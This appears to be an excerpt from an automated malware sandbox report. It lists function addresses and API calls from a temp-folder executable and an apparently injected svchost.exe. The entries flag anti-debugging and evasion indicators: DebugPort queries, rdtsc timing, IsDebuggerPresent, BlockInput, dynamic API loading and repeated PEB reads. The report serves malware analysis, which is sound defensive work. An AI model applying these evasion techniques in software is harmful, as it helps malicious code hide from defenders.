Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_03B5BBA0 rdtsc

6_2_03B5BBA0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_00417CB3 LdrLoadDll,

6_2_00417CB3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E93F09 BlockInput,

5_2_00E93F09

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00E23B3A

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E55A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

5_2_00E55A7C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E24B37 LoadLibraryA,GetProcAddress,

5_2_00E24B37

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00DE34E0 mov eax, dword ptr fs:[00000030h]	5_2_00DE34E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00DE3480 mov eax, dword ptr fs:[00000030h]	5_2_00DE3480
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00DE1E70 mov eax, dword ptr fs:[00000030h]	5_2_00DE1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B533A5 mov eax, dword ptr fs:[00000030h]	6_2_03B533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B633A0 mov eax, dword ptr fs:[00000030h]	6_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B633A0 mov eax, dword ptr fs:[00000030h]	6_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B8739A mov eax, dword ptr fs:[00000030h]	6_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B8739A mov eax, dword ptr fs:[00000030h]	6_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B28397 mov eax, dword ptr fs:[00000030h]	6_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B28397 mov eax, dword ptr fs:[00000030h]	6_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B28397 mov eax, dword ptr fs:[00000030h]	6_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2E388 mov eax, dword ptr fs:[00000030h]	6_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2E388 mov eax, dword ptr fs:[00000030h]	6_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2E388 mov eax, dword ptr fs:[00000030h]	6_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5438F mov eax, dword ptr fs:[00000030h]	6_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5438F mov eax, dword ptr fs:[00000030h]	6_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C053FC mov eax, dword ptr fs:[00000030h]	6_2_03C053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	6_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	6_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	6_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B663FF mov eax, dword ptr fs:[00000030h]	6_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF3E6 mov eax, dword ptr fs:[00000030h]	6_2_03BEF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C0539D mov eax, dword ptr fs:[00000030h]	6_2_03C0539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B403E9 mov eax, dword ptr fs:[00000030h]	6_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEB3D0 mov ecx, dword ptr fs:[00000030h]	6_2_03BEB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	6_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B383C0 mov eax, dword ptr fs:[00000030h]	6_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B383C0 mov eax, dword ptr fs:[00000030h]	6_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B383C0 mov eax, dword ptr fs:[00000030h]	6_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B383C0 mov eax, dword ptr fs:[00000030h]	6_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C05341 mov eax, dword ptr fs:[00000030h]	6_2_03C05341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B27330 mov eax, dword ptr fs:[00000030h]	6_2_03B27330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF132D mov eax, dword ptr fs:[00000030h]	6_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF132D mov eax, dword ptr fs:[00000030h]	6_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5F32A mov eax, dword ptr fs:[00000030h]	6_2_03B5F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	6_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B50310 mov ecx, dword ptr fs:[00000030h]	6_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB930B mov eax, dword ptr fs:[00000030h]	6_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB930B mov eax, dword ptr fs:[00000030h]	6_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB930B mov eax, dword ptr fs:[00000030h]	6_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A30B mov eax, dword ptr fs:[00000030h]	6_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A30B mov eax, dword ptr fs:[00000030h]	6_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A30B mov eax, dword ptr fs:[00000030h]	6_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BD437C mov eax, dword ptr fs:[00000030h]	6_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B37370 mov eax, dword ptr fs:[00000030h]	6_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B37370 mov eax, dword ptr fs:[00000030h]	6_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B37370 mov eax, dword ptr fs:[00000030h]	6_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF367 mov eax, dword ptr fs:[00000030h]	6_2_03BEF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29353 mov eax, dword ptr fs:[00000030h]	6_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29353 mov eax, dword ptr fs:[00000030h]	6_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB035C mov eax, dword ptr fs:[00000030h]	6_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB035C mov eax, dword ptr fs:[00000030h]	6_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB035C mov eax, dword ptr fs:[00000030h]	6_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB035C mov ecx, dword ptr fs:[00000030h]	6_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB035C mov eax, dword ptr fs:[00000030h]	6_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB035C mov eax, dword ptr fs:[00000030h]	6_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFA352 mov eax, dword ptr fs:[00000030h]	6_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB2349 mov eax, dword ptr fs:[00000030h]	6_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2D34C mov eax, dword ptr fs:[00000030h]	6_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2D34C mov eax, dword ptr fs:[00000030h]	6_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB92BC mov eax, dword ptr fs:[00000030h]	6_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB92BC mov eax, dword ptr fs:[00000030h]	6_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB92BC mov ecx, dword ptr fs:[00000030h]	6_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB92BC mov ecx, dword ptr fs:[00000030h]	6_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B402A0 mov eax, dword ptr fs:[00000030h]	6_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B402A0 mov eax, dword ptr fs:[00000030h]	6_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B452A0 mov eax, dword ptr fs:[00000030h]	6_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B452A0 mov eax, dword ptr fs:[00000030h]	6_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B452A0 mov eax, dword ptr fs:[00000030h]	6_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B452A0 mov eax, dword ptr fs:[00000030h]	6_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	6_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	6_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	6_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	6_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	6_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC72A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC72A0 mov eax, dword ptr fs:[00000030h]	6_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C052E2 mov eax, dword ptr fs:[00000030h]	6_2_03C052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6329E mov eax, dword ptr fs:[00000030h]	6_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6329E mov eax, dword ptr fs:[00000030h]	6_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6E284 mov eax, dword ptr fs:[00000030h]	6_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6E284 mov eax, dword ptr fs:[00000030h]	6_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB0283 mov eax, dword ptr fs:[00000030h]	6_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB0283 mov eax, dword ptr fs:[00000030h]	6_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB0283 mov eax, dword ptr fs:[00000030h]	6_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C05283 mov eax, dword ptr fs:[00000030h]	6_2_03C05283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF2F8 mov eax, dword ptr fs:[00000030h]	6_2_03BEF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B292FF mov eax, dword ptr fs:[00000030h]	6_2_03B292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE12ED mov eax, dword ptr fs:[00000030h]	6_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B402E1 mov eax, dword ptr fs:[00000030h]	6_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B402E1 mov eax, dword ptr fs:[00000030h]	6_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B402E1 mov eax, dword ptr fs:[00000030h]	6_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	6_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	6_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	6_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]	6_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]	6_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	6_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	6_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	6_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	6_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	6_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	6_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B392C5 mov eax, dword ptr fs:[00000030h]	6_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B392C5 mov eax, dword ptr fs:[00000030h]	6_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2823B mov eax, dword ptr fs:[00000030h]	6_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B67208 mov eax, dword ptr fs:[00000030h]	6_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B67208 mov eax, dword ptr fs:[00000030h]	6_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B59274 mov eax, dword ptr fs:[00000030h]	6_2_03B59274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B71270 mov eax, dword ptr fs:[00000030h]	6_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B71270 mov eax, dword ptr fs:[00000030h]	6_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE0274 mov eax, dword ptr fs:[00000030h]	6_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B34260 mov eax, dword ptr fs:[00000030h]	6_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B34260 mov eax, dword ptr fs:[00000030h]	6_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B34260 mov eax, dword ptr fs:[00000030h]	6_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFD26B mov eax, dword ptr fs:[00000030h]	6_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BFD26B mov eax, dword ptr fs:[00000030h]	6_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2826B mov eax, dword ptr fs:[00000030h]	6_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2A250 mov eax, dword ptr fs:[00000030h]	6_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C05227 mov eax, dword ptr fs:[00000030h]	6_2_03C05227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEB256 mov eax, dword ptr fs:[00000030h]	6_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEB256 mov eax, dword ptr fs:[00000030h]	6_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B36259 mov eax, dword ptr fs:[00000030h]	6_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29240 mov eax, dword ptr fs:[00000030h]	6_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B29240 mov eax, dword ptr fs:[00000030h]	6_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6724D mov eax, dword ptr fs:[00000030h]	6_2_03B6724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4B1B0 mov eax, dword ptr fs:[00000030h]	6_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C051CB mov eax, dword ptr fs:[00000030h]	6_2_03C051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	6_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	6_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	6_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	6_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB019F mov eax, dword ptr fs:[00000030h]	6_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB019F mov eax, dword ptr fs:[00000030h]	6_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB019F mov eax, dword ptr fs:[00000030h]	6_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB019F mov eax, dword ptr fs:[00000030h]	6_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2A197 mov eax, dword ptr fs:[00000030h]	6_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2A197 mov eax, dword ptr fs:[00000030h]	6_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2A197 mov eax, dword ptr fs:[00000030h]	6_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C061E5 mov eax, dword ptr fs:[00000030h]	6_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B70185 mov eax, dword ptr fs:[00000030h]	6_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEC188 mov eax, dword ptr fs:[00000030h]	6_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEC188 mov eax, dword ptr fs:[00000030h]	6_2_03BEC188
